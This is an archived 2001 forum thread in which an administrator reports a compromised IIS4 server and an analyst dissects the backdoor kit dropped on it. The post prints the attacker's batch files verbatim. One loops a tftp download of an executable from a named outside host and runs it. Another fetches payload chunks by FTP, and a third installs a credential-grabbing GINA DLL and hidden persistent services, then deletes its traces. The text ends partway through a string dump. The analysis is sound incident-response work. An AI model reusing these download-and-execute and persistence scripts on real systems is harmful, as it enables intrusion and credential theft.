When the Administrator was hacked

[asylu3]

Moderator: Incidents, Forensics, or the bit bucket, whatever you like.


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ FW: I've been hacked!! +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


On Mon, 19 Feb 2001 22:21:51 -0500, "Larry K." wrote


I am fairly new to security issues, but I am very experienced with Windows.
Today I found that somone broke into my NT 4.0 server. It is running IIS 4
for an internal web page and someone copied some files to my scripts
directory. They were able to execute a file called dl.exe that was hogging
all of my CPU cycles. I found that I had not removed anonymous access and
access from the outside. Can anyone help me find out how they got in and
make sure that they can't get back in? Any help would be appreciated.


Here is a list of the file names:


00.d
dl.bat
dl.exe
ftpcmds.txt


dl.bat contains the following:


echo off
cd Inetpubscripts
startDL:
tftp.exe -i web004.2coolweb.com get DL.exe
if not exist DL.exe goto startDL
start /w DL.exe
ren 00.D install.bat
attrib TFTP* -r
attrib DL.exe -r
del TFTP*
del DL.exe
install.bat %1
exit


ftpcmds.txt contains the following:


open 216.205.125.115 29292
user DL
DL
get 00.D
get 01.D
get 02.D
get 03.D
get 04.D
get 05.D
get 06.D
get 07.D
get 08.D
get 09.D
get 10.D
get 11.D
get 12.D
get 13.D
bye
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ END FW: I've been hacked!! +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


While this doesn't shed much light on how Larry K, was hacked, it illustrates
the results of leaving IIS un-hardened.


I ambled over to
tftp://63.84.169.1:69 (web004.2coolweb.com)
for DL.EXE, and then to
216.205.125.115:29292">ftp://DL216.205.125.115:29292 (115-216.205.125.dellhost.com)
for the BackGate kit that was downloaded to Larry's IIS4 box.


Below is what I found. Creates a Warez repository and FTP Proxy.
No response to attempts at contacting host owners or upstream of the (T)FTP
site(s) distributing malware.


Matt 2001-02-20


Text strings courtesy of BinText by Robin Keir
http://www.foundstone.com
UPX is The Ultimate Packer for eXecutables
http://upx.tsx.org


=====================
Contents of DL.EXE
tftp from 63.84.169.1
=====================
UPX 1.02 contents Un-packed


00001C10 00401C10 0 wininet.dll
00001C20 00401C20 0 FtpGetFileA
00001C64 00401C64 0 FtpPutFileA
00001CA8 00401CA8 0 FtpSetCurrentDirectoryA
00001D08 00401D08 0 InternetOpenA
00001D50 00401D50 0 InternetConnectA
00001F70 00401F70 0 FtpOpenFileA
00001FB8 00401FB8 0 FtpDeleteFileA
000016DF 004016DF 0 *AZ:FTPInstFileDLProject1.vbp
000019D4 004019D4 0 vb wininet
00001CC4 00401CC4 0 /05.D
00002144 00402144 0 216.205.125.115
00002174 00402174 0 /00.D
00002194 00402194 0 /01.D
000021B4 004021B4 0 /02.D
000021D4 004021D4 0 /03.D
000021F4 004021F4 0 /04.D
00002224 00402224 0 /06.D
00002244 00402244 0 /07.D
00002264 00402264 0 /08.D
00002284 00402284 0 /09.D
000022A4 004022A4 0 /10.D
000022C4 004022C4 0 /11.D
000022E4 004022E4 0 /12.D
00002304 00402304 0 /13.D
=====EoF=====


================
Contents of 00.D
================
echo off
echo Renaming Files
ren 01.D dir.txt
ren 02.D FireDaemon.exe
ren 03.D login.txt
ren 04.D MMtask.exe
ren 05.D NewGina.dll
ren 06.D reggina.exe
ren 07.D regit.exe
ren 08.D restrict.exe
ren 09.D restsec.exe
ren 10.D settings.reg
ren 11.D SUD.exe
ren 12.D makeini.exe
ren 13.D SUD.ini
echo Making ini
.makeini.exe %1
echo Making Dirs
md %windir%system32os2dllnew
attrib %windir%system32os2dllnew +s +h
.restrict.exe %windir%system32os2dllnew
md %1:adminback0810root
attrib %1:adminback0810root +s +h
.restrict.exe %1:adminback0810root
md %1:adminback0810rootsystem
attrib %1:adminback0810rootsystem +s +h
.restrict.exe %1:adminback0810rootsystem
md %1:adminback0810rootsystemdll
attrib %1:adminback0810rootsystemdll +s +h
.restrict.exe %1:adminback0810rootsystemdll
echo Copying Files
copy .FireDaemon.exe %windir%system32os2dllnew > nul:
copy .SUD.exe %windir%system32os2dllnew > nul:
copy .SUD.bak %windir%system32os2dllnew > nul:
copy .login.txt %windir%system32os2dllnew > nul:
copy .dir.txt %windir%system32os2dllnew > nul:
copy .MMtask.exe %windir%system32os2dllnew > nul:
copy .newgina.dll %windir%system32 > nul:
attrib %windir%system32newgina.dll +s +h
echo Setting up Registry
.regit.exe .settings.reg
echo Installing Services
set MXBIN=%windir%system32os2dllnew
set MXHOME=%windir%system32os2dllnew
%windir%system32os2dllnewFiredaemon.exe -i OS2SRV
"%windir%system32os2dllnew" "%windir%system32os2dllnewSUD.exe" "" Y 0
0 N Y
%windir%system32os2dllnewFiredaemon.exe -i MMTASK
"%windir%system32os2dllnew" "%windir%system32os2dllnewMMtask.exe" ""
Y 0 0 N Y
.reggina.exe
echo Waiting 5 sec.
.restsec.exe 5
echo Starting Services
net start os2srv
net start mmtask
echo Services Installed and Started
echo Deleting Install-Files
del FireDaemon.exe
del makeini.exe
del SUD.exe
del SUD.ini
del SUD.bak
del login.txt
del dir.txt
del MMtask.exe
del newgina.dll
del restrict.exe
del regit.exe
del settings.reg
del reggina.exe
del restsec.exe
attrib E.asp -r
del E.asp
del dl.bat
del install.bat
=====EOF=====


================
Contents of 01.D
DIR.TXT
================


---
%ServerKBps KBps Current bandwith used
%Dfree MB free
---
=====EoF=====
================
Contents of 02.D
FIREDAEMON.EXE
================
UPX 1.02 contents Un-packed
File pos Mem pos ID Text
======== ======= == ====
0000E2AC 0040E2AC 0 v0.09c
0000E2B4 0040E2B4 0